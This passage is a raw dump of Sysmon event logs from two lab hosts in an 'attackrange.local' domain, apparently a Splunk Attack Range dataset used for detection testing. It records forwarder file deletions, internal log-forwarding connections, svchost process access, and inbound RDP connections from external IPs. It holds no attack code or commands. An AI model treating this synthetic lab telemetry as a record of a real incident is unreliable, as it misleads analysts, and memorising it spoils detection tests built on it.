Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.445{69CF5F33-8EC5-6151-3D7A-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:37.619{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A38E17FA4B534CAECCD0961DE17868EC,SHA256=EC72C9690D11F0F47F0ADDA14F5BE8B4C18DDB0B5BBF39320E8F3B216F3632B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:38.866{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A25EC48D27CF1F3C9027D80BF0C0E0DE,SHA256=73B9438FA5E3892421663B165C009B3F4A0E01C9561E55BA59CB4BA8782E563D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:35.051{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58982-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001057977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:36.098{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54322-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:37.994{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EA06EB35F31664F7D53450A6734884F,SHA256=13F314E283C3798873AE9B51029DD9D076FD712752DE83C259640CE459AC51A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:39.867{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A189F421289539AC0CEED3EFB10094C0,SHA256=41BFBCB2F5C8EF77A17198D72957DE1AFC2C07262C775B63CA1C73938A49AA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:39.745{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=391F8B2CCE48B0A83C9C049305756B57,SHA256=16CF7F573A277A62B7ABC79FB74549B7F23F460728261A29D09A419AED69D307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:39.104{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46D61CF8FC5968A551919771440A907A,SHA256=CDDBA7DF2DC04D18D77D23C7B37E58D0423267E0336489B9BF627C6BC6EEBBFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:40.898{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A131BA1A7F55FB61B7B8591963672EBC,SHA256=D6D51D07084C2B709DBE41C9D654A8C4A81C9F19A76B1B61E6897948E283CC32,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:38.368{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63173-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:40.323{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F0746315BAC09B548C62C224B12FFE,SHA256=088C6610970C13AA72A11E69B7F7E52B87C79AF54E433B0EBB2A4089981E20D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:41.557{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693BB29BD028FB04B455AF879D912DD1,SHA256=AAA4ADE1C76E53C9464F9B408972E08760B5CB41D2C3B8817C6789A49F53E97B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:37.689{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59597-false10.0.1.12-8000- 23542300x80000000000000001057983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:42.557{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CADB6641A80CDF0771B340B8DEE0B1D,SHA256=8637C5494A8C39F25ED0E10C327B5077C0F1D757AF722300775D559E94A40ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:42.132{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9F960C85523F7C6513DF59E4A85359,SHA256=D936BBBD549101BC979ED12A5687BEB20F66C65EA1DAF9058359A12A2FD611F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:42.006{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54323-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:41.608{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62332-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:43.688{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F55D9A492E5051DE657F6A453FADEA0E,SHA256=8B8CE4350DBE89A1B88B0978BBF9E922A932531DD3B61DC4D48D4E9F7DAF15B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:43.610{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B915C15FE5415A8DB0F494D2AF147ED,SHA256=B7B4637637A1DF85C3F51DA2C27322453885F1AEBF854499ECF66B08B0B50DDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:43.309{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE42CE0E92F46687452693D98E46F68B,SHA256=1EF67BA739FFA08C450DA2D10349E7FDDCEDDC34ADAB3DBA663B199B3883ADF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:44.610{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BF08137E0EB594441E3097D674F2FD,SHA256=8A073B70C4EBE5975655C98045CCEE3A7987FFF2E74F67C5DA24F4E9ECD31EDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:44.403{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BDB6B23DEDA4F065B432824395F06A,SHA256=871B5DF5CD50779C0E02BED5530432A6677763263EF87753B85E0F0D80416E31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:45.673{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2454E6A055AFAD2098E03AA14C86F733,SHA256=A3C59F993CE007BDAD5A0CF3A7A961C6853024C436F8EB2C8586CB2EF1605A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:45.450{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFC2CA6B7CD685794F90DC7DE5200AF,SHA256=F7618D05FB09600CBEDD844F6D97A0083013C9EC68BB401DAD8AF456FEEE5715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:46.673{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2263B9FDD91F244F6C4A99C2FB009D7B,SHA256=CD41F4AF442F0E401500131A268455B500DA3D629B06DBC916F6B8060A6145B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:46.465{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14EBCA744B1B37D33037835E5DC03C85,SHA256=E7AA68433C53373EC1B57645E742C2CC2D2456892907071E16AA1BCFB77BB3E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:43.695{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59598-false10.0.1.12-8000- 23542300x8000000000000000982315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:47.543{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C233E882A6AF74E4953CD19BBF4232,SHA256=32A6041584BF404C7CDA19A41802D5A633645DC947B9A590BB075C65920068F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:47.673{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EC850A7D5093E58CE09ABF731416245,SHA256=15CF59BEA84A8D4441040E4DF0347BAE275B80EEB7CAEBA71156FA43DF7B30A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:44.563{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53506-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:47.231{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86247CF35D2BE2A6D23A0932A9087874,SHA256=146D10DE157A9280CC3EF43FB7D3EB9B246F6D34A3733B51F3DF9914D42231B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:47.231{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B39CC7E707B5B98021B3CD4EDD184C7,SHA256=8BF7602D47BB6B4ACAB834E81150FCE99B4EFD90AB8824D68F564319C462ED27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:48.762{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C31950A01E446CB9E6B87C77CEF5D2D,SHA256=CBADF173C1DCDCEBA636D9D2E485D35D4AA4BBCE6BCBB37D444FA411F47C0A90,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:47.104{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:48.673{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F5CA69B0FCD52C6AD51D9BBE07D7E00,SHA256=2B055ABCE8C239B0BD6A2F14D80276CA1951E9EBEF8F0CA40600A83B3CF7526F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:49.892{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:49.892{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:49.892{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:49.689{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B449644F78505031C7F752C86F18188,SHA256=FB6FB90D6AFC424D3B4ED8ECF5F2F613EAFC57BB30C2465531309F148AF2C1DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:50.814{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E56F769945C9A6F8185989296AFD9C7E,SHA256=555A6A1071FC32CCDB5E95A6BA96D0A10BB45536CB5E9D740CD7AD5B7B4825E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:49.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14CF0D3B745971C930EBBA456E5E87AA,SHA256=23E24303A901AD748E2F764A4C89105ADC589CECA22D5BF887420304A595EFC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:51.548{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000982319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:48.898{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59599-false10.0.1.12-8000- 23542300x8000000000000000982318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:51.012{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB1D658DAD9534730160223124A3EC40,SHA256=56D5089DD2E98D8B8AC80A6AE0E85C418CAFA8887B930D438965FCE730044493,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:50.732{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57919-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001058002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:52.126{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B002080A1FAC270A2F9E29E3CA19FB3F,SHA256=3EC38D7A615842B90CECC668E53F45884FD51FAB0CDD130157FA36B3632AA8BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:52.126{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00CA88FAC5D2ADA72EC26F446144B6E8,SHA256=9A6E0E3ECC70C2621838EABDCF714BB19AF6820B2D3134274E42E65D7F9CD116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:52.048{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB1C3A9EEE5E7FB8A2A967F862A76D70,SHA256=AF5914D70DE894A725B290BFBB0242D0B72C9DCD441A148D744A52014C44EC86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:52.028{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6F1FC256166E5EA546235B26898970,SHA256=C7CD77275C67A243662FE5A9467A14C303EB85A6514967E6509AA4C13B6D3818,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:53.028{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CB58018335E8664036D7C2A770342B,SHA256=5A35456E1715D448E87829B1CAC68EA5ECE144DFAA4ABBB67CF0C158E3619428,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:51.680{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.243-12620-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001058004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:53.111{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 